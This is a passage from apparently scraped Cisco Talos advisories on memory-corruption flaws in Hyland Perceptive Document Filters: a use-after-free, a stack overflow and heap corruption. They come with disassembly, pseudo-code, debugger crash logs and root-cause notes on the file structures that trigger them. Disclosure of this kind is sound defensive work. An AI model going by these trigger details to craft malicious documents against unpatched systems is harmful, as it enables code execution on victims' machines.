.text:F4FA1B0F call operator new(uint)\n \n\nFurther during `ISYS_NS::LibraryHD::CDocument::~CDocument` object destruction inside the `sub_F4FC12A0` function we can observe a call at address `F4FC12FD` which deallocates the vulnerable object:\n \n \n 
sub_F4FC12A0\n (...)\n .text:F4FC12F7 sub esp, 0Ch\n .text:F4FC12FA mov eax, [edx]\n .text:F4FC12FC push edx\n .text:F4FC12FD call dword ptr [eax+4]\n .text:F4FC1300\n .text:F4FC1300 i:\n .text:F4FC1300 add esp, 10h\n .text:F4FC1303\n .text:F4FC1303 loc_F4FC1303: ; CODE XREF: sub_F4FC12A0+55\u2191j\n .text:F4FC1303 sub esp, 0Ch\n .text:F4FC1306 push esi\n .text:F4FC1307 call std::_Rb_tree_increment(std::_Rb_tree_node_base *)\n .text:F4FC130C mov esi, eax\n .text:F4FC130E add esp, 10h\n .text:F4FC1311 cmp eax, edi\n .text:F4FC1313 jnz short loc_F4FC12F0\n .text:F4FC1315\n .text:F4FC1315 loc_F4FC1315: ; CODE XREF: sub_F4FC12A0+4A\u2191j\n .text:F4FC1315 sub esp, 8\n .text:F4FC1318 mov eax, [ebp+var_10]\n .text:F4FC131B mov edx, [eax+8]\n .text:F4FC131E push edx\n .text:F4FC131F push eax\n .text:F4FC1320 call sub_F4FC4650\n .text:F4FC1325 mov eax, [ebp+arg_0]\n .text:F4FC1328 add eax, 20h ; ' '\n .text:F4FC132B mov [esp], eax\n .text:F4FC132E call common::EscherDraw::closeCanvas(void)\n \n \n Call stack for deallocation\n \n #0 0xf60a6fdb in ISYS_NS::CStream::~CStream() () from ./libISYSshared.so\n #1 0xf608ddee in ISYS_NS::CTemporaryStream::~CTemporaryStream() () from ./libISYSshared.so\n #2 0xf4fb550f in ?? () from ./libISYSreadershd.so\n #3 0xf4fc1300 in ?? () from ./libISYSreadershd.so\n #4 0xf4fbb9a8 in ?? () from ./libISYSreadershd.so\n #5 0xf4fa5da1 in ?? () from ./libISYSreadershd.so \n #6 0xf52f4dd5 in ISYS_NS::LibraryHD::CDocument::~CDocument () from ./libISYSreadershd.so\n #7 0xf52ece6b in ISYS_NS::LibraryHD::IGR_HDAPI_Open () from ./libISYSreadershd.so\n #8 0xf5973302 in ?? () from ./libISYSreaders.so\n #9 0xf597855d in ISYS_NS::exports::IGR_Open_File_FromStream () from ./libISYSreaders.so\n #10 0xf7f405e3 in IGR_Open_Stream_Ex () from ./libISYS11df.so\n #11 0x080590eb in ?? ()\n #12 0x08061690 in ?? 
()\n #13 0x08068c27 in main_doc2text(ISYS_NS::CISYScommander::CResult*, void*) ()\n #14 0xf617c73d in ISYS_NS::CISYScommander::CTool::execute(ISYS_NS::CISYScommander::CResult*) const () from ./libISYSshared.so\n #15 0xf6188ff9 in bool ISYS_NS::CISYScommander::execute<char>(int, char**) () from ./libISYSshared.so\n #16 0xf6185524 in ISYS_NS::CISYScommander::execute(int, char**) () from ./libISYSshared.so\n #17 0x08054e88 in ?? ()\n #18 0xf5af6637 in __libc_start_main (main=0x8054d40, argc=0x5, argv=0xffb96a24, init=0x807ebd0, fini=0x807ebc0, rtld_fini=0xf7f88880 <_dl_fini>, stack_end=0xffb96a1c) at ../csu/libc-start.c:291\n #19 0x080531b1 in ?? ()\n \n\nNext, a few instructions below, at `F4FC132E`, a call to the `common::EscherDraw::closeCanvas` method is made:\n \n \n .text:F4FC1325 mov eax, [ebp+arg_0]\n .text:F4FC1328 add eax, 20h ; ' '\n .text:F4FC132B mov [esp], eax\n .text:F4FC132E call common::EscherDraw::closeCanvas(void)\n \n\nwhich internally, as the `Use After Free call stack` listing above shows, calls `ISYS_NS::CSkiaStreamBridge::write` and thereby reuses the freed stream object. An attacker who properly manipulates the heap state between the object's deallocation and its reuse can easily turn this use after free vulnerability into arbitrary code execution.\n\n### Crash Information\n \n \n ==24951== Command: ./isys_doc2text --html --no-images -o /tmp/dump /home/icewall/Advisory/perceptive/malicous.docx\n ==24951== \n [1] File type: Microsoft Word (25); Capabilities: 15 - /home/icewall/Advisory/perceptive/malicous.docx\n ==24951== Invalid read of size 8\n ==24951== at 0xA7F3DE8: ISYS_NS::CSkiaStreamBridge::write(void const*, unsigned long) (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYSgraphics.so)\n ==24951== by 0xA67697F: ??? 
(in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYSgraphics.so)\n ==24951== by 0xA314735: png_write_sig (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYSgraphics.so)\n ==24951== by 0xA32420A: png_write_info_before_PLTE (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYSgraphics.so)\n ==24951== by 0xA324396: png_write_info (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYSgraphics.so)\n ==24951== by 0xA6776CD: SkPNGImageEncoder::doEncode(SkWStream*, SkBitmap const&, bool const&, int, int, SkBitmap::Config, png_color_8_struct&, SkImageEncoderDetails const*) (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYSgraphics.so)\n ==24951== by 0xA677B11: SkPNGImageEncoder::onEncode(SkWStream*, SkBitmap const&, int, SkImageEncoderDetails const*) (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYSgraphics.so)\n ==24951== by 0xA67F318: SkImageEncoder::encodeStream(SkWStream*, SkBitmap const&, int, SkImageEncoderDetails const*) (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYSgraphics.so)\n ==24951== by 0xA67F523: SkImageEncoder::EncodeStream(SkWStream*, SkBitmap const&, SkImageEncoder::Type, int, SkImageEncoderDetails const*) (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYSgraphics.so)\n ==24951== by 0x9550EE2: ??? (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYSreadershd.so)\n ==24951== by 0x955168B: ??? (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYSreadershd.so)\n ==24951== by 0x9565EFD: ??? 
(in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYSreadershd.so)\n ==24951== Address 0xada3ae0 is 0 bytes inside a block of size 112 free'd\n ==24951== at 0x4C2F24B: operator delete(void*) (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\n ==24951== by 0x52A32C2: ISYS_NS::CTemporaryStream::~CTemporaryStream() (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYSshared.so)\n ==24951== by 0x994BC10: ??? (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYSreadershd.so)\n ==24951== by 0x9955173: ??? (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYSreadershd.so)\n ==24951== by 0x993A1EA: ??? (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYSreadershd.so)\n ==24951== by 0x9C3D345: ??? (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYSreadershd.so)\n ==24951== by 0x9C35E7E: ??? (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYSreadershd.so)\n ==24951== by 0x86C44A0: ??? (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYSreaders.so)\n ==24951== by 0x86C9196: ??? (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYSreaders.so)\n ==24951== by 0x4E3F87A: IGR_Open_Stream_Ex (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYS11df.so)\n ==24951== by 0x416BE6: ??? (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/isys_doc2text)\n ==24951== by 0x41EB99: ??? (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/isys_doc2text)\n ==24951== Block was alloc'd at\n ==24951== at 0x4C2E0EF: operator new(unsigned long) (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\n ==24951== by 0x993B782: ??? (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYSreadershd.so)\n ==24951== by 0x993F7A0: ??? 
(in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYSreadershd.so)\n ==24951== by 0x9943B6A: ??? (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYSreadershd.so)\n ==24951== by 0x9949E52: ??? (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYSreadershd.so)\n ==24951== by 0x994B979: ??? (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYSreadershd.so)\n ==24951== by 0x9951A44: ??? (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYSreadershd.so)\n ==24951== by 0x9C38AA4: ??? (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYSreadershd.so)\n ==24951== by 0x9C3B2C2: ??? (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYSreadershd.so)\n ==24951== by 0x9C3C3FB: ??? (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYSreadershd.so)\n ==24951== by 0x9C35D75: ??? (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYSreadershd.so)\n ==24951== by 0x86C44A0: ??? (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYSreaders.so)\n ==24951== \n pure virtual method called\n terminate called without an active exception\n ==24951== \n ==24951== Process terminating with default action of signal 6 (SIGABRT)\n ==24951== at 0x800C428: raise (raise.c:54)\n ==24951== by 0x800E029: abort (abort.c:89)\n ==24951== by 0x77C584C: __gnu_cxx::__verbose_terminate_handler() (in /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.21)\n ==24951== by 0x77C36B5: ??? 
(in /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.21)\n ==24951== by 0x77C3700: std::terminate() (in /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.21)\n ==24951== by 0x77C423E: __cxa_pure_virtual (in /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.21)\n ==24951== by 0xA7F3DED: ISYS_NS::CSkiaStreamBridge::write(void const*, unsigned long) (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYSgraphics.so)\n ==24951== by 0xA67697F: ??? (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYSgraphics.so)\n ==24951== by 0xA314735: png_write_sig (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYSgraphics.so)\n ==24951== by 0xA32420A: png_write_info_before_PLTE (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYSgraphics.so)\n ==24951== by 0xA324396: png_write_info (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYSgraphics.so)\n ==24951== by 0xA6776CD: SkPNGImageEncoder::doEncode(SkWStream*, SkBitmap const&, bool const&, int, int, SkBitmap::Config, png_color_8_struct&, SkImageEncoderDetails const*) (in /home/icewall/bugs/PerceptiveDocumentFilters/bin/linux/intel-64/libISYSgraphics.so)\n \n\n### Timeline\n\n2018-02-22 - Vendor Disclosure \n2018-03-22- Vendor patched \n2018-04-26 - Public Release\n\n##### Credit\n\nDiscovered by Marcin 'Icewall' Noga of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2018-0528\n\nPrevious Report\n\nTALOS-2018-0536\n", "edition": 1, "reporter": "Talos Intelligence", "published": "2018-04-26T00:00:00", "title": "Hyland Perceptive Document Filters DOCX to HTML Code Execution Vulnerability", "type": "talos", "enchantments": {}, "bulletinFamily": "info", "cvelist": ["CVE-2018-3844"], "modified": "2018-04-26T00:00:00", "id": "TALOS-2018-0527", "href": "http://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0527", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-04-26T17:44:48", "references": [], 
"description": "# Talos Vulnerability Report\n\n### TALOS-2018-0538\n\n## Hyland Perceptive Document Filters DOC to HTML updateNumbering Code Execution Vulnerability\n\n##### April 26, 2018\n\n##### CVE Number\n\nCVE-2018-3855\n\n### Summary\n\nAn exploitable stack-based buffer overflow exists in the DOC-to-HTML conversion functionality of the Hyland Perceptive Document Filters version 11.4.0.2647. A crafted .doc document can lead to a stack-based buffer, resulting in direct code execution.\n\n### Tested Versions\n\nPerceptive Document Filters 11.4.0.2647 - x86/x64 Windows/Linux Perceptive Document Filters 11.2.0.1732 - x86/x64 Windows/Linux\n\n### Product URLs\n\n<https://www.hyland.com/en/perceptive#docfilters>\n\n### CVSSv3 Score\n\n8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\n\n### CWE\n\nCWE-121: Stack-based Buffer Overflow\n\n### Details\n\nThis vulnerability is present in the Hyland Document filter conversion, which is used for big data, eDiscovery, DLP, email archival, content management, business intelligence and intelligent capture services. \nIt can convert common formats, such as Microsoft's document formats into more usable and easily viewed formats. There is a vulnerability in the conversion process of a .doc document to HTML. A specially crafted .doc file can lead to a stack-based buffer overflow and remote code execution. Let\u2019s investigate this vulnerability. 
After we attempt to convert a malicious DOC using the Hyland library, we see the following state:\n \n \n icewall@ubuntu:$ ./isys_doc2text --html -o /tmp/a ./storage/2fa87ae8d1beba2b25940dca4088afde^C\n isys_doc2text 11.2.0.1732 Copyright (c) 1988-2015 Perceptive Software\n \n [00000000] File type: Text (UTF8) (74); Capabilities: 0001 - /tmp/a\n <!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\"\n \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\">\n <html xmlns=\"http://www.w3.org/1999/xhtml\">\n <head>\n <title></title>\n <meta http-equiv=\"content-type\" content=\"text/html; charset=utf-8\" />\n </head>\n <body>\n <p>[1] File type: Microsoft Word (25); Capabilities: 15 - ./storage/2fa87ae8d1beba2b25940dca4088afde\n <br />\n </p>\n </body>\n </html>[00000000] Returned 201 characters\n [00000000] File type: Microsoft Word (25); Capabilities: 000f - ./storage/2fa87ae8d1beba2b25940dca4088afde\n \n Program received signal SIGSEGV, Segmentation fault.\n 0xf5603824 in intermediate::Office::IOfficeShape::updateNumbering(long*, long*, int*) () from ./libISYSreadershd.so\n (rr) bt 10\n #0 0xf5603824 in intermediate::Office::IOfficeShape::updateNumbering(long*, long*, int*) () from ./libISYSreadershd.so\n #1 0xffffffff in ?? ()\n #2 0xffffffff in ?? ()\n #3 0xffffffff in ?? ()\n #4 0xffffffff in ?? ()\n #5 0xffffffff in ?? ()\n #6 0xffffffff in ?? ()\n #7 0xffffffff in ?? ()\n #8 0xffffffff in ?? ()\n #9 0xffffffff in ?? 
()\n (More stack frames follow...)\n gdb-peda$ context\n [----------------------------------registers-----------------------------------]\n EAX: 0xffffffff \n EBX: 0xf5a86aec --> 0x99e30c \n ECX: 0xffffff01 \n EDX: 0xffffff01 \n ESI: 0x83 \n EDI: 0xff8f4790 --> 0xffffffff \n EBP: 0xff8f45c8 --> 0xffffffff \n ESP: 0xff8f45c0 --> 0xffffffff \n EIP: 0xf5603824 (:Office::IOfficeShape::updateNumbering(long*, long*, int*)+68>: 0x5f5e0889)\n EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)\n [-------------------------------------code-------------------------------------]\n 0xf560381c <intermediate::Office::IOfficeShape::updateNumbering(long*, long*, int*)+60>: jl 0xf5603810 <intermediate::Office::IOfficeShape::updateNumbering(long*, long*, int*)+48>\n 0xf560381e <intermediate::Office::IOfficeShape::updateNumbering(long*, long*, int*)+62>: inc DWORD PTR [edi+ecx*4]\n 0xf5603821 <intermediate::Office::IOfficeShape::updateNumbering(long*, long*, int*)+65>: mov eax,DWORD PTR [ebp+0xc]\n => 0xf5603824 <intermediate::Office::IOfficeShape::updateNumbering(long*, long*, int*)+68>: mov DWORD PTR [eax],ecx\n 0xf5603826 <intermediate::Office::IOfficeShape::updateNumbering(long*, long*, int*)+70>: pop esi\n 0xf5603827 <intermediate::Office::IOfficeShape::updateNumbering(long*, long*, int*)+71>: pop edi\n 0xf5603828 <intermediate::Office::IOfficeShape::updateNumbering(long*, long*, int*)+72>: pop ebp\n 0xf5603829 <intermediate::Office::IOfficeShape::updateNumbering(long*, long*, int*)+73>: ret\n [------------------------------------stack-------------------------------------]\n 0000| 0xff8f45c0 --> 0xffffffff \n 0004| 0xff8f45c4 --> 0xffffffff \n 0008| 0xff8f45c8 --> 0xffffffff \n 0012| 0xff8f45cc --> 0xffffffff \n 0016| 0xff8f45d0 --> 0xffffffff \n 0020| 0xff8f45d4 --> 0xffffffff \n 0024| 0xff8f45d8 --> 0xffffffff \n 0028| 0xff8f45dc --> 0xffffffff \n [------------------------------------------------------------------------------]\n Legend: code, data, 
rodata, value\n Stopped reason: SIGSEGV\n \n\nAs we can see, stack data has been completely overwritten by value `0xFFFFFFFF` inside the `intermediate::Office::IOfficeShape::updateNumbering` function. Showing this function in pseudo-code, it looks like this:\n \n \n Line 1 _DWORD __cdecl intermediate::Office::IOfficeShape::updateNumbering(intermediate::Office::IOfficeShape *this, int *maxIndex, int *minIndex, int *array)\n Line 2 {\n Line 3 int _minIndexValue; // ecx\n Line 4 int _maxnIndexValue; // edx\n Line 5 int *v6; // eax\n Line 6 int result; // eax\n Line 7 int *v8; // eax\n Line 8 int v9; // edx\n Line 9 \n Line 10 _minIndexValue = *minIndex;\n Line 11 if ( *minIndex <= 10 )\n Line 12 {\n Line 13 if ( _minIndexValue == -1 )\n Line 14 {\n Line 15 _minIndexValue = 0;\n Line 16 *minIndex = 0;\n Line 17 }\n Line 18 }\n Line 19 else\n Line 20 {\n Line 21 _minIndexValue = 10;\n Line 22 *minIndex = 10;\n Line 23 }\n Line 24 _maxnIndexValue = *maxIndex;\n Line 25 if ( _minIndexValue < *maxIndex )\n Line 26 {\n Line 27 if ( _maxnIndexValue != -1 )\n Line 28 {\n Line 29 v6 = &array[_maxnIndexValue];\n Line 30 do\n Line 31 {\n Line 32 *v6 = -1;\n Line 33 --_maxnIndexValue;\n Line 34 --v6;\n Line 35 }\n Line 36 while ( _minIndexValue < _maxnIndexValue );\n Line 37 }\n Line 38 goto LABEL_7;\n Line 39 }\n Line 40 \n Line 41 (...)\n \n\nThe values of significant arguments are equal:\n \n \n int minIndex = 0xffffff01 (-255) \n int maxIndex = 0x0\n \n\nWith the arguments having the above mentioned values, we pass both checks at lines `25` and `27` and later assign a pointer to the first element of the `array` table to the `v6` variable. Inside the loop at `lines 30-36` just after the first iteration, the `v6` pointer will be set to an address before the beginning of `array`, causing an out-of-bounds write at `line 32`, and will result in corruption of stack values.\n\nThe loop for the following parameters will be executed 255 times. 
The vulnerability exists because the check at `line 13` is not sufficient: it does not consider values below zero other than -1. The vulnerability would not occur if the check at `line 24` were done on `unsigned integers`.\n\nTracking where the value of `minIndex` was set, we land in the following place:\n \n \n const intermediate::common::ITextStyle *__cdecl intermediate::odf::TextParagraphProperties::TextParagraphProperties\n (...)\n mov DWORD PTR [eax+0x64],0xffffff01\n \n\nSo the `-255` value of `minIndex` (judging by the name of a getter function, it is exactly `NumberingLevel`) is a default value set inside the \"Text Paragraph Properties\" constructor. Further investigation showed that this default value is only overwritten if a particular paragraph has a corresponding `PAPX` (Paragraph Property Exceptions) record, which contains an `sprm` (Property Modifier) with a value of `0x260a`. According to the `MS-DOC` format specification, that `sprm` is `sprmPIlvl`. Also, looking at the call stack before the corruption:\n \n \n gdb-peda$ bt\n #0 0xf56037e5 in intermediate::Office::IOfficeShape::updateNumbering(long*, long*, int*) () from ./libISYSreadershd.so\n #1 0xf5633bbe in intermediate::Office::Shape2003::addTextContentUnit(intermediate::Office::IOfficeTextItem*, intermediate::common::ITextContentUnit*, intermediate::common::ITextNumberingTable*, long*, int*) () from ./libISYSreadershd.so\n #2 0xf566ab76 in intermediate::odf::TextDocumentContent::createParagraph(std::vector<intermediate::common::ITextContentUnit*, std::allocator<intermediate::common::ITextContentUnit*> >&, int, int, bool, int, bool) () from ./libISYSreadershd.so\n #3 0xf566ba72 in intermediate::odf::TextDocumentContent::createParagraph(std::vector<intermediate::common::ITextContentUnit*, std::allocator<intermediate::common::ITextContentUnit*> >&, int, int, bool) () from ./libISYSreadershd.so\n #4 0xf566e1ed in intermediate::odf::TextDocumentContent::TextDocumentContent(reader::word97_2003::Document 
const&, intermediate::odf::TextDocumentPackages*, intermediate::odf::TextNumberingTable*) () from ./libISYSreadershd.so\n #5 0xf568b49d in intermediate::odf::TextDocumentPackagesImpl::Init(reader::word97_2003::Document const&, intermediate::odf::TextDocumentPackages*) () from ./libISYSreadershd.so\n #6 0xf568c047 in intermediate::odf::TextDocumentPackages::TextDocumentPackages(std::auto_ptr<reader::word97_2003::Document>) () from ./libISYSreadershd.so\n #7 0xf575cdf4 in ISYS_NS::LibraryHD::CDocument::openWord(IStorage*) () from ./libISYSreadershd.so\n #8 0xf575dfea in ISYS_NS::LibraryHD::CDocument::open(IGR_Stream*, int, wchar_t const*) () from ./libISYSreadershd.so\n #9 0xf57594d9 in ISYS_NS::LibraryHD::IGR_HDAPI_Open(IGR_Stream*, int, wchar_t const*, void**, wchar_t*) () from ./libISYSreadershd.so\n #10 0xf623f6d1 in ISYS_NS::exports::IGR_Open_File_FromStream(wchar_t const*, wchar_t const*, ISYS_NS::CStream*, bool, ISYS_NS::exports::Ext_Open_Options*, int, wchar_t const*, int*, int*, void**, int*, int, Error_Control_Block*) () from ./libISYSreaders.so\n #11 0xf624513c in ISYS_NS::exports::IGR_Open_Stream_Ex(IGR_Stream*, int, unsigned short const*, int*, int*, void**, Error_Control_Block*) () from ./libISYSreaders.so\n #12 0xf5f4b673 in IGR_Open_Stream_Ex () from ./libISYS11df.so\n #13 0x08050654 in processStream(std::string const&, tagTIGR_Stream*, bool, int, int, bool, std::ostream&, int, double) ()\n #14 0x08054574 in processFile(std::string const&, int, int, bool, std::ostream&) ()\n #15 0x080581f9 in main ()\n #16 0xf5bbe637 in __libc_start_main (main=0x8057b90 <main>, argc=0x5, argv=0xff8fbc34, init=0x8069890 <__libc_csu_init>, fini=0x8069880 <__libc_csu_fini>, rtld_fini=0xf7fd2880 <_dl_fini>, stack_end=0xff8fbc2c) at ../csu/libc-start.c:291\n #17 0x0804d6e1 in _start ()\n \n\nWe can deduce that the paragraph is inside a shape object, and that is one of the crucial requirements to trigger the vulnerability. 
An attacker who provides a malicious .doc document for conversion to HTML could trigger this vulnerability, and potentially gain code execution on the system.\n\n### Crash Information\n \n \n Starting program: /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/isys_doc2text --html -o /tmp/a ./storage/2fa87ae8d1beba2b25940dca4088afde\n [Thread debugging using libthread_db enabled]\n Using host libthread_db library \"/lib/x86_64-linux-gnu/libthread_db.so.1\".\n [1] File type: Microsoft Word (25); Capabilities: 15 - ./storage/2fa87ae8d1beba2b25940dca4088afde\n \n Program received signal SIGSEGV, Segmentation fault.\n 0xf516d174 in ?? () from ./libISYSreadershd.so\n (gdb) bt 10\n #0 0xf516d174 in ?? () from ./libISYSreadershd.so\n #1 0xffffffff in ?? ()\n #2 0xffffffff in ?? ()\n #3 0xffffffff in ?? ()\n #4 0xffffffff in ?? ()\n #5 0xffffffff in ?? ()\n #6 0xffffffff in ?? ()\n #7 0xffffffff in ?? ()\n #8 0xffffffff in ?? ()\n #9 0xffffffff in ?? ()\n (More stack frames follow...)\n \n gdb-peda$ context\n [----------------------------------registers-----------------------------------]\n EAX: 0xffffffff \n EBX: 0xf56b4f0c --> 0xa42fcc \n ECX: 0xffffff01 \n EDX: 0xffffff01 \n ESI: 0xa3 \n EDI: 0xffffade0 --> 0xffffffff \n EBP: 0xffffaa98 --> 0xffffffff \n ESP: 0xffffaa90 --> 0xffffffff \n EIP: 0xf516d174 (mov DWORD PTR [eax],ecx)\n EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)\n [-------------------------------------code-------------------------------------]\n 0xf516d16c: jl 0xf516d160\n 0xf516d16e: inc DWORD PTR [edi+ecx*4]\n 0xf516d171: mov eax,DWORD PTR [ebp+0xc]\n => 0xf516d174: mov DWORD PTR [eax],ecx\n 0xf516d176: pop esi\n 0xf516d177: pop edi\n 0xf516d178: pop ebp\n 0xf516d179: ret\n [------------------------------------stack-------------------------------------]\n 0000| 0xffffaa90 --> 0xffffffff \n 0004| 0xffffaa94 --> 0xffffffff \n 0008| 0xffffaa98 --> 0xffffffff \n 0012| 0xffffaa9c --> 0xffffffff \n 0016| 0xffffaaa0 
--> 0xffffffff \n 0020| 0xffffaaa4 --> 0xffffffff \n 0024| 0xffffaaa8 --> 0xffffffff \n 0028| 0xffffaaac --> 0xffffffff \n [------------------------------------------------------------------------------]\n Legend: code, data, rodata, value\n Stopped reason: SIGSEGV\n \n\n### Timeline\n\n2018-03-16 - Vendor Disclosure \n2018-03-22 - Vendor patched \n2018-04-26 - Public Release\n\n##### Credit\n\nDiscovered by Marcin \"Icewall\" Noga of Cisco Talos.\n\n* * *\n\nVulnerability Reports Previous Report\n\nTALOS-2018-0534\n", "edition": 1, "reporter": "Talos Intelligence", "published": "2018-04-26T00:00:00", "title": "Hyland Perceptive Document Filters DOC to HTML updateNumbering Code Execution Vulnerability", "type": "talos", "enchantments": {}, "bulletinFamily": "info", "cvelist": ["CVE-2018-3855"], "modified": "2018-04-26T00:00:00", "id": "TALOS-2018-0538", "href": "http://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0538", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-04-26T17:44:44", "references": [], "description": "# Talos Vulnerability Report\n\n### TALOS-2018-0534\n\n## Hyland Perceptive Document Filters Microsoft Word CDATA Code Execution Vulnerability\n\n##### April 26, 2018\n\n##### CVE Number\n\nCVE-2018-3851\n\n### Summary\n\nAn exploitable heap corruption exists in the Microsoft Word-to-many-types conversion functionality of the Hyland Perceptive Document Filters version 11.4.0.2647. A crafted Microsoft Word (XML) document can lead to heap corruption resulting in remote code execution. 
An attacker can provide a specially crafted file to trigger this vulnerability.\n\n### Tested Versions\n\nPerceptive Document Filters 11.4.0.2647 - x86/x64 Windows/Linux\n\n### Product URLs\n\n<https://www.hyland.com/en/perceptive#docfilters>\n\n### CVSSv3 Score\n\n8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\n\n### CWE\n\nCWE-787: Out-of-bounds Write\n\n### Details\n\nThis vulnerability is present in the Hyland Document filter conversion which is used for big data, eDiscovery, DLP, email archival, content management, business intelligence and intelligent capture services. \nIt can convert common formats such as Microsoft's document formats into more usable and easily viewed formats. There is a vulnerability in the conversion process of a Microsoft Word (XML) to JPEG, HTML5 and several other formats. A specially crafted Microsoft Word (XML) file can lead to heap corruption and remote code execution. Let\u2019s investigate this vulnerability:\n\nAfter we attempt to convert a malicious Microsoft Word (xml) using the Hyland library we see the following state:\n \n \n isys_doc2text --html5 -o /tmp malformed_doc.xml\n [1] File type: Microsoft Word (25); Capabilities: 3 - malformed_doc.xml\n \n Program received signal SIGSEGV, Segmentation fault.\n __memcpy_sse2_unaligned () at ../sysdeps/i386/i686/multiarch/memcpy-sse2-unaligned.S:628\n 628 ../sysdeps/i386/i686/multiarch/memcpy-sse2-unaligned.S: No such file or directory.\n (rr) bt\n #0 __memcpy_sse2_unaligned () at ../sysdeps/i386/i686/multiarch/memcpy-sse2-unaligned.S:628\n #1 0xf6028fef in ISYS_NS::CMemoryStream::Write(void const*, unsigned int) () from ./libISYSshared.so\n #2 0xf5fe3c75 in ISYS_NS::XML::CXmlBuilderLite::write(ISYS_NS::XML::XMLNode*, ISYS_NS::CStream*, bool, int) () from ./libISYSshared.so\n #3 0xf5fe392f in ISYS_NS::XML::CXmlBuilderLite::write(ISYS_NS::XML::XMLNode*, ISYS_NS::CStream*, bool, int) () from ./libISYSshared.so\n #4 0xf5fe392f in 
ISYS_NS::XML::CXmlBuilderLite::write(ISYS_NS::XML::XMLNode*, ISYS_NS::CStream*, bool, int) () from ./libISYSshared.so\n #5 0xf5fdf815 in ISYS_NS::XML::XMLNode::xml(std::string&) () from ./libISYSshared.so\n #6 0xf614ae9e in ISYS_NS::CMSWord2003XMLFilesBuilder::ParagraphOrTable(ISYS_NS::XML::XMLNode*) () from ./libISYSshared.so\n #7 0xf61414c0 in ISYS_NS::CMSWord2003XML::needFileList() () from ./libISYSshared.so\n #8 0xf61416a9 in ISYS_NS::CMSWord2003XML::CMSWord2003XML(ISYS_NS::CStream*) () from ./libISYSshared.so\n #9 0xf4aa8ecc in ?? () from ./libISYSreadershd.so\n #10 0xf4aa9ef5 in ?? () from ./libISYSreadershd.so\n #11 0xf4c3920f in ?? () from ./libISYSreadershd.so\n #12 0xf4e7a5d5 in ?? () from ./libISYSreadershd.so\n #13 0xf515b6e8 in ?? () from ./libISYSreadershd.so\n #14 0xf5163492 in ?? () from ./libISYSreadershd.so\n #15 0xf58eeeb3 in ?? () from ./libISYSreaders.so\n #16 0xf58f455d in ?? () from ./libISYSreaders.so\n #17 0xf7ebc5e3 in IGR_Open_Stream_Ex () from ./libISYS11df.so\n #18 0x080590eb in ?? ()\n #19 0x08061690 in ?? ()\n #20 0x08068c27 in main_doc2text(ISYS_NS::CISYScommander::CResult*, void*) ()\n #21 0xf60f873d in 